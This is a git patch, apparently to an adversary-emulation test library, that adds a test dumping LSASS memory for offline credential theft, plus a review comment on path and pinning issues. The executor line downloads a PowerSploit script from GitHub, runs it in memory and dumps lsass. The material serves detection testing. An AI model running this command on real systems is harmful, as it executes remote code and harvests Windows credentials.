From 030040bf73eb7bcb09b863af45b567e34ef0236c Mon Sep 17 00:00:00 2001 From: JimmyAstle Date: Wed, 13 Jan 2021 14:11:12 -0500 Subject: [PATCH] Out minidump (#1368) * Adding a test of Out-Minidump.ps1 Adding in a credential dumping test that leverages Out-Minidump.ps1 to dump the contents of lsass to disk for offline extraction * Fixing cleanup path Path is actually %TEMP% Co-authored-by: jimmy astle --- atomics/T1003.001/T1003.001.yaml | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml index 22aacb82..f4f6e00a 100644 --- a/atomics/T1003.001/T1003.001.yaml +++ b/atomics/T1003.001/T1003.001.yaml @@ -233,3 +233,17 @@ atomic_tests: pypykatz live lsa name: command_prompt elevation_required: true +- name: Dump LSASS.exe Memory using Out-Minidump.ps1 + description: | + The memory of lsass.exe is often dumped for offline credential theft attacks. This test leverages a pure + powershell implementation that leverages the MiniDumpWriteDump Win32 API call. + Upon successful execution, you should see the following file created $env:SYSTEMROOT\System32\lsass_*.dmp. + supported_platforms: + - windows + executor: + command: | + IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Out-Minidump.ps1'); get-process lsass | Out-Minidump + cleanup_command: | + Remove-Item $env:TEMP\lsass_*.dmp -ErrorAction Ignore + name: powershell + elevation_required: true \ No newline at end of file
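Review bot: the description and the cleanup_command in the new atomic disagree on where the dump lands. The description tells the reader to expect `$env:SYSTEMROOT\System32\lsass_*.dmp`, while `cleanup_command` removes `$env:TEMP\lsass_*.dmp`, and the commit message itself says "Path is actually %TEMP%". Change the description to name the same location the cleanup deletes, otherwise anyone validating detections for this test will look for the artifact in the wrong directory, and the dump file will remain on disk after cleanup runs. Two smaller points on the same hunk: the executor downloads Out-Minidump.ps1 from the `master` branch of the upstream repository at run time, so the test's behaviour changes whenever that branch does; consider pinning to a specific commit or exposing the URL as an input argument so it can be overridden in an offline lab. The file also now ends without a trailing newline, which the diff flags as `\ No newline at end of file`; add one so the YAML stays consistent with the rest of the file.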